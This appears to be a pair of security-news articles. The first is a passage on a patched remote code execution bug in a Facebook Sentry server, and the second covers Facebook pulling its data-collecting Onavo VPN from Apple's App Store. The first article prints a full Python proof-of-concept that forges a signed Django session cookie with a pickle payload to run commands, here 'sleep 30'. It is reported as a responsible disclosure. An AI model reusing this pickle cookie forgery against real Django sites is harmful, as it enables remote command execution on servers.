Though remote code execution bugs are considered serious problems, Le Gall noted that no Facebook user data was ever exposed or accessed via the uncovered hole. The bug was patched this month prior to today’s disclosure.

The programming blunder was spotted in a Facebook server running the Sentry log collection software.

“While I was looking at the application, some stacktraces regularly popped on the page, for an unknown reason,” Le Gall explained. “The application seemed to be unstable regarding the user password reset feature, which occasionally crashed.”

Looking through the logs, the researcher noted that he was able to see where in the stack the cookie details were handled, as well as spot where the application was using Pickle, a Python data serialization format that can be vulnerable to manipulation.

With that information, Le Gall was able to craft cookies that would run commands on the machine. Here is the proof-of-concept exploit – a tampered cookie that makes the server sleep for 30 seconds before responding:

#!/usr/bin/python
# Le Gall's proof-of-concept as published; note it is Python 2 (print statement, cPickle).
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'  # Django secret key recovered from the leaked stacktraces
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
# With the secret key known, the signed session cookie decodes back into a dict.
newContent = django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
# Pickle invokes __reduce__ on deserialization, so this object becomes
# os.system("sleep 30") the moment the server unpickles the cookie.
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

# Re-sign the tampered payload; the server will trust the signature and unpickle it.
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Say what you will about Facebook, but the company’s handling of bug reports appears to be on point. Le Gall said that the same day the flaw was reported, July 30, Facebook took down the server. Ten days later, a patch was in place and the server was brought back online.

The social network has made security a focal point in the aftermath of the Cambridge Analytica scandal, and in this case at least it appears to be paying off. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/facebook_remote_code_execution_bug/

Facebook pulls its privacy-violating Onavo VPN from Apple’s App Store

Apple last week suggested that Facebook remove its Onavo security app from the App Store due to privacy rule violations. On Wednesday, Facebook complied.

Onavo, an Israel-based company that Facebook acquired in 2013, has been raising eyebrows for months. Facebook had been pushing people to download the virtual private network (VPN) app for “protection” without mentioning that it was phoning home to Facebook to deliver users’ app usage habits… even when the VPN was turned off.

Back in March, after he saw media coverage of the app’s behavior and decided to see for himself what it was up to, Sudo Security Group CEO Will Strafach published his findings about the data collected by Onavo Protect for iOS.

Strafach said that he found that Onavo Protect “uses a Packet Tunnel Provider app extension, which should consistently run for as long as the VPN is connected” …in order to periodically send this data to Facebook as the user goes about their day:

  • When the user’s mobile device screen is turned on and turned off.
  • Total daily Wi-Fi data usage in bytes (Even when VPN is turned off).
  • Total daily cellular data usage in bytes (Even when VPN is turned off).
  • Periodic beacon containing an “uptime” to indicate how long the VPN has been connected.

As the Wall Street Journal reported last year, Facebook had used that data to track its competition and scope out new product categories.

Onavo Protect has been free to download from Apple’s App Store for years, sailing through Apple’s app review board with regularly approved updates. In addition to warning users about malicious sites, it allows them to create a VPN that redirects their internet traffic to one of Facebook’s servers: what it bills as a way to “keep you and your data safe.”

But that process enabled Facebook to collect and analyze users’ activity to find out how people use their phones beyond Facebook’s mobile app. TechCrunch gave a few examples of how much this might benefit Facebook: the insights enable it to get an early peek at apps that are becoming big hits, to spot apps that are seeing slower user uptake, and to learn which new features are appealing to users.

The snooping came to light after Facebook added a “Protect” button to its iOS app that took users to Onavo Protect in the App Store.

Somebody familiar with the Onavo situation told the Wall Street Journal that earlier this month Apple told Facebook that the app violated new rules, put forth in June, that limited data collection.

Those new guidelines stipulated that apps that get users’ permission to access contact lists and photos can’t then use the information to build databases or sell it to third parties. The new rules also said that apps need consent when “recording, logging or making a record of a user’s activity” and that advertisements inside apps must allow users to see all the information used to target them.

The person said that Apple told Facebook that Onavo violated a part of its developer agreement that prevents apps from using data in ways that go beyond what’s directly relevant to the app or to provide advertising.

Apple officials reportedly told Facebook last week that Onavo violated the company’s rules on data collection by developers. On Thursday, they suggested that Facebook voluntarily remove the app.

An Apple spokesperson told CNBC that the company’s latest guidelines make it clear that Onavo’s behavior was out of line:

We work hard to protect user privacy and data security throughout the Apple ecosystem. With the latest update to our guidelines, we made it explicitly clear that apps should not collect information about which other apps are installed on a user’s device for the purposes of analytics or advertising/marketing and must make it clear what user data will be collected and how it will be used.

In June, in hundreds of pages of written responses to questions from Congress, Facebook said that it’s not using Onavo data “for Facebook product uses” or to collect information about individuals. However, it did admit that it uses Onavo to gather information about apps’ popularity and what people do with them – information it uses to improve its own products, without tying it to individual users.

Facebook sent media outlets a statement in which it said that it’s always been upfront about Onavo with users: the Onavo privacy policy makes it clear that users are being tracked, it said.

We’ve always been clear when people download Onavo about the information that is collected and how it is used. As a developer on Apple’s platform we follow the rules they’ve put in place.

Nonetheless, when Apple suggested last week that Facebook yank the app, Facebook agreed, and down it came.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/6CUdleCX9tA/